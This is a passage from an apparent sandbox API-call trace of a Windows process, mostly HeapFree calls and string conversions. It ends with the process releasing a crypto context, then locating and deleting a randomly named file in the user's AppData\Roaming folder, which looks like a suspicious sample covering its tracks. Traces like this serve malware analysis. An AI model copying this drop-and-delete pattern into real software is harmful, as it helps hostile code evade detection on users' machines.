lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.986] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0149.986] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0149.987] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.987] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.993] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0149.993] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ed8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.995] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.995] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.995] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.995] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.995] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.995] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.996] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.996] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.996] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.996] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0149.996] CryptReleaseContext (hProv=0x9bf550, dwFlags=0x0) returned 1 [0149.996] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.996] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.996] FreeLibrary (hLibModule=0x76390000) returned 1 [0149.996] CloseHandle (hObject=0x4ec) returned 1 [0150.001] CloseHandle (hObject=0x4fc) returned 1 [0150.004] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.004] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.004] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/rCxPhCicoc5u7sEbYlz.ots", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\rCxPhCicoc5u7sEbYlz.ots", lpFilePart=0x8cedf4*="rCxPhCicoc5u7sEbYlz.ots") returned 0x37 [0150.004] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\rCxPhCicoc5u7sEbYlz.ots" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rcxphcicoc5u7sebylz.ots")) returned 0x20 [0150.004] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\rCxPhCicoc5u7sEbYlz.ots", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1dd180, ftCreationTime.dwHighDateTime=0x1d5d285, ftLastAccessTime.dwLowDateTime=0x24619f50, ftLastAccessTime.dwHighDateTime=0x1d5c7a0, ftLastWriteTime.dwLowDateTime=0x24619f50, ftLastWriteTime.dwHighDateTime=0x1d5c7a0, nFileSizeHigh=0x0, nFileSizeLow=0x942f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="rCxPhCicoc5u7sEbYlz.ots", cAlternateFileName="RCXPHC~1.OTS")) returned 0x9e1af8 [0150.004] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\rCxPhCicoc5u7sEbYlz.ots" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\rcxphcicoc5u7sebylz.ots")) returned 1 [0150.016] FindNextFileW (in: hFindFile=0x9e1af8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1dd180, ftCreationTime.dwHighDateTime=0x1d5d285, ftLastAccessTime.dwLowDateTime=0x24619f50, ftLastAccessTime.dwHighDateTime=0x1d5c7a0, ftLastWriteTime.dwLowDateTime=0x24619f50, ftLastWriteTime.dwHighDateTime=0x1d5c7a0, nFileSizeHigh=0x0, nFileSizeLow=0x942f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="rCxPhCicoc5u7sEbYlz.ots", cAlternateFileName="RCXPHC~1.OTS")) returned 0 [0150.016] FindClose (in: hFindFile=0x9e1af8 | out: hFindFile=0x9e1af8) returned 1 [0150.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.016] HeapFree (in: hHeap=0x2af0000, 